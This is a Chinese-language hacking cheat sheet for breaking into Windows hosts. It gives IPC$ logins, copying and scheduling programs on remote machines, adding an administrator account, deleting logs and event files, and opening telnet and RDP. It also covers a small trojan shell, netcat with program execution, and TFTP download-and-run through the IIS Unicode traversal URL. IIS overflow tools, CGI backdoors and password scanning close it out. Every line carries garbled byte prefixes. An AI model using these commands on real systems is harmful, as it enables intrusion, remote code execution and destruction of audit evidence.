网管和黑客都必须知道的命令
K.n� #�;�| 常用的几条NET命令:
!dYkvoQNn� *�?�7Ie�;) (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
^��$Dpdz�I s"�<�k)�Xi (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
�J_OI�U#-B e�l39�HB$ (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
d�y�;U��e5 i��Ti<X�|X (查看远程主机时间) net time \\IP地址
�IM}T2\tZ} p�
m��cy(< (定时启动某个程序) at \\IP地址 02:18 readme.exe
J�
(Y�fu�p �.G#�S�*L� (查看共享) net view \\IP地址
5��@bLD�P� KD*,u{v;� (查看netbios工作组列表) nbtstat -A IP地址
!9��DqW&8 V=BF"S;-'� (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
~S1�5tZ $ �sX�k�Ws2! (这两条把自己增加到管理员组): net user 用户名 密码 /add
F`3c uL[�N Zh�]d&Xe�q net localgroup Administrators 用户名 /add
/c�Uc�fe#X (X@�JlAfB (断开连接) net use \\IP地址\ipc$ /delete
0�:���R��} .@Z��qCH� 扫尾:
7-.Y��VM~R /O�u`$2H87 del C:\winnt\system32\logfiles\*.*
*r$Y�v&�c, ]fI�v{[A_
del C:\winnt\ssytem32\config\*.evt
�MbC7`Sp&i #.U�ooFk+Y del C:\winnt\system32\dtclog\*.*
W~k"`g7uu� o-�Pa�3�L= del C:\winnt\system32\*.log
}�x`�W+��r K?,eIZ�{.S del C:\winnt\system32\*.txt
g8
�,V( ^ Ry�K�sM. � del C:\winnt\*.txt
kXA
�o+l�� ��a�Erms-~ del C:\winnt\*.log
\,i�9�m9;y �aG}��j�u; 一、netsvc.exe
��3�:X3n\z m��+||�t�� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�>�x�ws��� nellN}jYsM netsvc /list \\IP地址
B�y��o�SwQ -�$J\BkI�� netsvc schedule \\IP地址 /query
#"f�BF/��Q N��%%2!�Z# netsvc \\IP地址 schedule /start
RrRrB"!8nR N_lQz(nG/2 二、OpenTelnet.exe
�la��>:%SD *P_(�hG�&c 远程启动主机的Telnet服务,并绑定端口到7878,例如:
}20
Q`?��� s�3kHND�dC OpenTelnet \\IP地址 用户名 密码 1 7878
H%>
E6rV�B G1��z[v�3T 然后就可以telnet到主机的7878端口,进入DOS方式下:
~UX@%0�%)N (wU<Kpt?�J telnet IP地址 7878
�B>�*zQb2: O%;H#3kn&s 三、winshell.exe
�%eB��0�)' y{+$B
�Y$_ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
S:4'��k�^E ,�3�&XV�%1 p Path (查看winshell主程序的路径信息)
lfp[�(Ph)9 �&[�$��qA b reBoot (重新启动机器)
[��X�]�yj� I�L`�X}=L_ d shutDown (关闭机器)
J�^8(h� R :0x,%V74_! s Shell (执行后你就会看到可爱的“C:\>”)
e3,T�Y.,Ay -U~]Bu�gvh x eXit (退出本次登录会话,此命令并不终止winshell的运行)
xD�v�$z.=Y i"Hec��9Ri CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�Md(Aqa�A AM � cHR=/ 四、3389登陆器,GUI方式登录远程主机的
N7:=%�F�y( t+7h�(?8L� 五、elsave.exe
v=e`e6�8U~ `&2~\�o/� 事件日志清除工具
bD*V$w*��P {I0b��%>r= elsave -s \\IP地址 -l "application" -C
�+?Vj��}p; g*�?)o!_�* elsave -s \\IP地址 -l "system" -C
S7]\tw_�L) )zz^R�B\�p elsave -s \\IP地址 -l "security" -C
�H�6�%QM}t (? �j $n?p 执行后成功清除应用程序日志,系统日志,安全日志
8}z]B^?F�y gcDo o2RE 六、hbulot.exe
ms���2y[b� a3��D''Ra 开启win2kserver和winxp的3389服务
e���f8_w6i .'N:�]G@! hbulot [/r]
([SrI�G>�X |C}��n]{*| 使用/r表示安装完成后自动重起目标使设置生效。
��0�7 [%RG i3#To}�g5V 七、nc.exe(netcat.exe)
��i�dW��= F�5la:0f�b 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
����!=%�0� q�)vdDdRe_ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
zmd�,uhNc: 4.il4Qqy}i 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
X^�;[X~��g ]�5�| o8�. 参数:
7R9�.�g6j� eD5:�0;�X2 -e prog 程序重定向,一旦连接,就执行 [危险!!]
!lQGo�XQ'4 8a�xz`2�`� -g gateway source-routing hop point[s], up to 8
.�,�Q���j3 ��b-4g�HW� -G num source-routing pointer: 4, 8, 12, ...
W�*�?mc2;/ &�D@/_m $� -h 帮助信息
n�.9���k<� �vC$Q4�>�m -i secs 延时的间隔
H����QP��b d�Q��P7�CP -l 监听模式,用于入站连接
qZw4�"&,j$ pkTg.70w�U -n 指定数字的IP地址,不能用hostname
:�sO^b*e / �;VM',�40� -o file 记录16进制的传输
��}#0MJ6L 4HX�qRFUD -p port 本地端口号
�|]=�.� �^ Y�d�sY���2 -r 任意指定本地及远程端口
�LF o{,%�B '�2)c;/-E� -s addr 本地源地址
�DXX(q�k)6 ��xW|^2k�� -u UDP模式
r*�$$82�s xX���;@
BS -v 详细输出——用两个-v可得到更详细的内容
>J�dA,i�}1 >6 p
<��n -w secs timeout的时间
C���-��25\ �)�gM3,gSS -z 将输入输出关掉——用于扫描时
�"s�[Y�$!# 八、TFTPD32.EXE
;/tZ�s�E�{ ^E���j4�^d 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
/��P_1vQq lIR�0jgP@z http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�Hg�u:*iYA BP����f;!. 然后可以直接令文件运行:
�n0nf;E��� e�| �AA��7 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
��g~�q+a-� ~vf�&JH'�! 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
*�qx<bY@F� JiF��y.�Pf 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
W40GW����� �oL?[9aww� 一、一 Xscan命令行运行参数说明:
�t�:A,p�T3 $lJu2om�i1 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
ag�Q5�%t�# 1-z*'Ghys� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
9a.r(W�[�9 NpmPm1Ix . xscan -file <主机列表文件名> <检测项目> [其他选项]
Ub�1?�dk�� Y-8qAF?SJ] 其中<检测项目> 含义如下:
/��D9FjOP Rg:3�}T`~n -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
X�BJ�9"�G5 TWv�${m zE -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
2m`4B_g A
:V)W?~�Z7B -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
��i&�cH��� @(���:a�h -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
i�E�DZ\\, {?a9>g-BW� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
d<*4)MR��N W�Z.d"EE"� [其他选项] 含义如下:
3F%�Q�q7�v GP�qF�>��� -v: 显示详细扫描进度
��V<�} ^n �~c�E;�k@� -p: 跳过Ping不通的主机
�zs�+[Aco) a�pW0(&\�� -o: 跳过没有检测到开放端口的主机
��6r"P�tHr �rWN#QL()* -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
